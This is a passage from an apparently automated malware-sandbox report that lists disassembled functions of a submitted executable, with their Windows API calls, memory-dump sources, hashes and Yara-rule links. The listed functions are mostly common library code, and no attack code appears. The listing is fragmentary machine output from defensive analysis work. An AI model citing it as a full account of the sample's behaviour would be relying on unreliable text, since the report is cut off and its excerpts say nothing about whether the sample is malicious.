                                                                                              • Instruction Fuzzy Hash: 81F02830484348ABDF174F61EE0A7FB3B98AF45388F08A285FC44741A1C7B6C544EB60
                                                                                              Function 00E8A892 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00E8A843,00000000,?,00EB6150,?,?,?,00E8A9E6,00000004,InitializeCriticalSectionEx,00E9F7F4,InitializeCriticalSectionEx), ref: 00E8A89F
                                                                                              • GetLastError.KERNEL32(?,00E8A843,00000000,?,00EB6150,?,?,?,00E8A9E6,00000004,InitializeCriticalSectionEx,00E9F7F4,InitializeCriticalSectionEx,00000000,?,00E8A79D), ref: 00E8A8A9
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00E8A8D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: 8ecfa58bb03d68ccc18d56ad0eb016a74035eea7dab0363e893eb8f5074fd9f4
                                                                                              • Instruction ID: 3e29fdba105ef7a418ace27e63e4736b1df22fc62b880c6bbb2894d76ed0e3f1
                                                                                              • Opcode Fuzzy Hash: 8ecfa58bb03d68ccc18d56ad0eb016a74035eea7dab0363e893eb8f5074fd9f4
                                                                                              • Instruction Fuzzy Hash: 6BE04870280705BBEF113BA1DC0AB183B959B10B55F241033F90DF44E0D761985597A5
                                                                                              Function 00E907EA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                              • Instruction ID: 7397386da6cbde1704eace4ea093e53dc454befd0955a6f3758eb834304b9759
                                                                                              • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                              • Instruction Fuzzy Hash: E6A17B72E003869FEF25CF28C8917AEBBE5EF91314F58516DE594BB282C6748D81C790
                                                                                              Function 00E93638 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E90481,?,00000000,?,00000001,?,?,00000001,00E90481,?), ref: 00E93685
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E9370E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E8DBD1,?), ref: 00E93720
                                                                                              • __freea.LIBCMT ref: 00E93729
                                                                                                • Part of subcall function 00E9040E: RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: e7662327a923ac0f483861591edd692fb3b63816de7f76c59b238936e3d903c4
                                                                                              • Instruction ID: f778d9b33f2bdb028d29b3398e50d713c8cbe34cdab86581feca5c92843f0abb
                                                                                              • Opcode Fuzzy Hash: e7662327a923ac0f483861591edd692fb3b63816de7f76c59b238936e3d903c4
                                                                                              • Instruction Fuzzy Hash: 3A31BDB2A0020AABDF249F75DC85DAF7BE5EB00754F14012AFC08E6251EB35CE54CBA0
                                                                                              Function 00E762CD Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E762D4
                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00E762EB
                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00E76328
                                                                                              • _wcslen.LIBCMT ref: 00E76338
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3741103063-0
                                                                                              • Opcode ID: 54f2a91b55c97859ba0bb0f3d0eafada0a631667f0a8667362d9920064847010
                                                                                              • Instruction ID: 21d7fa48cc53ad6d6952f0e9ac8f015ebefb4a3db8f142cae21743c913ec6ca9
                                                                                              • Opcode Fuzzy Hash: 54f2a91b55c97859ba0bb0f3d0eafada0a631667f0a8667362d9920064847010
                                                                                              • Instruction Fuzzy Hash: 6311E370A0060ABFDB00AFA4DD858BFBBB9FF40348B14A11EB419B7240DB309D00CBA0
                                                                                              Function 00E7126C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E71273
                                                                                                • Part of subcall function 00E7067E: GetVersionExW.KERNEL32(?), ref: 00E706AF
                                                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00E6350C,522FB72A,00000000,?,?,00E643F5,?,?,?,00000000), ref: 00E7129A
                                                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00E712D4
                                                                                              • _wcslen.LIBCMT ref: 00E712DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FoldString$H_prolog3Version_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 535866816-0
                                                                                              • Opcode ID: 3bc585082870edb55b978ecafe13360da0cdae9a4e2f30f700fcf7ac43074e42
                                                                                              • Instruction ID: d91b17496625474f26ce3b1bef2fbf8e69972494b109b1dfc6a0503ff92f8216
                                                                                              • Opcode Fuzzy Hash: 3bc585082870edb55b978ecafe13360da0cdae9a4e2f30f700fcf7ac43074e42
                                                                                              • Instruction Fuzzy Hash: 8411C171A01225ABDB00ABADDD099AF7BA9EF04720F24524AB814F7291DB60990087F1
                                                                                              Function 00E919E4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00E9198B,00000000,00000000,00000000,00000000,?,00E91B88,00000006,FlsSetValue), ref: 00E91A16
                                                                                              • GetLastError.KERNEL32(?,00E9198B,00000000,00000000,00000000,00000000,?,00E91B88,00000006,FlsSetValue,00EA0DD0,FlsSetValue,00000000,00000364,?,00E900D7), ref: 00E91A22
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E9198B,00000000,00000000,00000000,00000000,?,00E91B88,00000006,FlsSetValue,00EA0DD0,FlsSetValue,00000000), ref: 00E91A30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 2e1eb3698506a21ac394559ac06a8f75a459a9eaa3efb603c43f0d53aef07a36
                                                                                              • Instruction ID: b324e10cb9a06388d4c85c62b37e41ba63f459c43ed4b3ec169cfcb4492d283d
                                                                                              • Opcode Fuzzy Hash: 2e1eb3698506a21ac394559ac06a8f75a459a9eaa3efb603c43f0d53aef07a36
                                                                                              • Instruction Fuzzy Hash: 0701F7326462239FCB219BAA9C44A5A7798AF057A5B211665F90AF3280C770DC05C6F0
                                                                                              Function 00E71309 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E71310
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00E717FB,?,?,\\?\,522FB702,?,?,?,00000000,00E9A279,000000FF), ref: 00E71319
                                                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00E9A279,000000FF), ref: 00E71348
                                                                                              • _wcslen.LIBCMT ref: 00E71351
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$H_prolog3_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 19219720-0
                                                                                              • Opcode ID: 2c7d1f7a249c27392093b812a74be602198180a9efa54dbcae1f979567528fdc
                                                                                              • Instruction ID: f3fcefb57b17b352358596677ff4bc9669a1054c646e65256abe061bbb72dbeb
                                                                                              • Opcode Fuzzy Hash: 2c7d1f7a249c27392093b812a74be602198180a9efa54dbcae1f979567528fdc
                                                                                              • Instruction Fuzzy Hash: 4B01F272900215BB8B01AFF999058FFBBB9AF81760B15624AB508F7240CF34490087E0
                                                                                              Function 00E7EB74 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00E7EB77
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E7EB86
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E7EB94
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E7EBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: f86e2b5c1e719cb53b97ca4ccb642fe6d94e0b72f1528029ac594cce750c2bde
                                                                                              • Instruction ID: 9a6685215c6faf0a169eb6fc2979a22b9fc4421c448251a44177b1a55fce17ea
                                                                                              • Opcode Fuzzy Hash: f86e2b5c1e719cb53b97ca4ccb642fe6d94e0b72f1528029ac594cce750c2bde
                                                                                              • Instruction Fuzzy Hash: 2CE0123294AF21AFD7612B76BD0DB873E94EF59B53F000741F745BA6D4C6B144088BA0
                                                                                              Function 00E77C68 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00E78294
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                                • Part of subcall function 00E8087E: __EH_prolog3_GS.LIBCMT ref: 00E80885
                                                                                                • Part of subcall function 00E8087E: GetLastError.KERNEL32(0000001C,00E78244,?,00000000,00000086,?,522FB702,?,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E8089D
                                                                                                • Part of subcall function 00E8087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E808D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                                                                              • String ID: %ls
                                                                                              • API String ID: 1279724102-3246610740
                                                                                              • Opcode ID: de188339548049471228a0fc8652b60085a11315b056d1e9d11ff5ef55f27f2e
                                                                                              • Instruction ID: 9f243a17006fed89a72c239a3d70c4ac5fa53931b4d52f3ea6c6312a4f1ded6e
                                                                                              • Opcode Fuzzy Hash: de188339548049471228a0fc8652b60085a11315b056d1e9d11ff5ef55f27f2e
                                                                                              • Instruction Fuzzy Hash: A5B1DE70884209EADB31EF90CA4AFEE7BF0AF25344F10A459F55A331E6DF715A15DA80
                                                                                              Function 00E928A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E9246B: GetOEMCP.KERNEL32(00000000,?,?,00E926F4,?), ref: 00E92496
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E92739,?,00000000), ref: 00E92914
                                                                                              • GetCPInfo.KERNEL32(00000000,9',?,?,?,00E92739,?,00000000), ref: 00E92927
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID: 9'
                                                                                              • API String ID: 546120528-600133814
                                                                                              • Opcode ID: de7cf840332e66df606455170b50d08196945dd695492da7e1a52a0ee31fca79
                                                                                              • Instruction ID: 08e62441d7f5d6e3dc3144e614bd62e33484799cc431aa49c48f458278f12e7c
                                                                                              • Opcode Fuzzy Hash: de7cf840332e66df606455170b50d08196945dd695492da7e1a52a0ee31fca79
                                                                                              • Instruction Fuzzy Hash: 0F513371A00342BFDF21DF35C8806FBBBE5EF81304F14606ED29AAB252D6759945CB90
                                                                                              Function 00E91E68 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00E91FD4
                                                                                                • Part of subcall function 00E8ACBB: IsProcessorFeaturePresent.KERNEL32(00000017,00E8AC8D,00E8535E,?,?,00000000,00E8535E,00000016,?,?,00E8AC9A,00000000,00000000,00000000,00000000,00000000), ref: 00E8ACBD
                                                                                                • Part of subcall function 00E8ACBB: GetCurrentProcess.KERNEL32(C0000417,?,00E8535E), ref: 00E8ACDF
                                                                                                • Part of subcall function 00E8ACBB: TerminateProcess.KERNEL32(00000000,?,00E8535E), ref: 00E8ACE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2667617558-3972193922
                                                                                              • Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                                                              • Instruction ID: ad873d542af5535a0fd7b0c92d37b243984271836c6e308f6168dadccfb2fec7
                                                                                              • Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                                                              • Instruction Fuzzy Hash: BF517D75E0020AAFDF14DFA8C881AADBBF5EF58314F2451AAE854F7341E7759A018B50
                                                                                              Function 00E92543 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00E92568
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID: $}*
                                                                                              • API String ID: 1807457897-1947344957
                                                                                              • Opcode ID: c6d94640f01079c0d36657b0d44beeaf0bd980cfab8048aa60d8051aba5e0898
                                                                                              • Instruction ID: 4a05f773845474bf799f2a55bcbd141c299f51981ce0d988a1e446c5da27b07e
                                                                                              • Opcode Fuzzy Hash: c6d94640f01079c0d36657b0d44beeaf0bd980cfab8048aa60d8051aba5e0898
                                                                                              • Instruction Fuzzy Hash: 36412C70504248BFDF228E24CC84BF6BBF9EB45308F1414EDE68AA7143D235AA45DF61
                                                                                              Function 00E6F103 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E779F7: GetSystemTime.KERNEL32(?,00000000), ref: 00E77A0F
                                                                                                • Part of subcall function 00E779F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00E77A1D
                                                                                                • Part of subcall function 00E779A0: __aulldiv.LIBCMT ref: 00E779A9
                                                                                              • __aulldiv.LIBCMT ref: 00E6F162
                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,522FB702,?,?,00000000,?,00000000,00E99F3D,000000FF), ref: 00E6F169
                                                                                                • Part of subcall function 00E61150: _wcslen.LIBCMT ref: 00E6115B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                                                              • String ID: .rartemp
                                                                                              • API String ID: 3789791499-2558811017
                                                                                              • Opcode ID: 65e8f4405c9036efe11628a8ed55326b385e9492f941290212955f6cd27e9193
                                                                                              • Instruction ID: 41c2688f348f0a4d143a861499500212957829758e9e4be0bba6ed91871ef3a1
                                                                                              • Opcode Fuzzy Hash: 65e8f4405c9036efe11628a8ed55326b385e9492f941290212955f6cd27e9193
                                                                                              • Instruction Fuzzy Hash: BB418271940248ABDB15EFB4DC45EEE77E8EF44390F445169F519B3282EB349B04CA60
                                                                                              Function 00E7DACE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E7DAD5
                                                                                                • Part of subcall function 00E70360: __EH_prolog3.LIBCMT ref: 00E70367
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Shell.Explorer$about:blank
                                                                                              • API String ID: 431132790-874089819
                                                                                              • Opcode ID: 055b3194dfe2290d0cc5bce69b4b602c08210ab21e8a3804bf3aa9aa37a7e3c1
                                                                                              • Instruction ID: d5831eab9b37844b9f25146f3343e8ecf85345f36554d4a94c3be493da22d669
                                                                                              • Opcode Fuzzy Hash: 055b3194dfe2290d0cc5bce69b4b602c08210ab21e8a3804bf3aa9aa37a7e3c1
                                                                                              • Instruction Fuzzy Hash: 9C414C706046019FDB18EFA4CC55B6A77B5AF88704F15D0AEE90ABF2A1DB71AD00CB50
                                                                                              Function 00E7D7EB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E7D7F2
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00E7D8E8
                                                                                              Strings
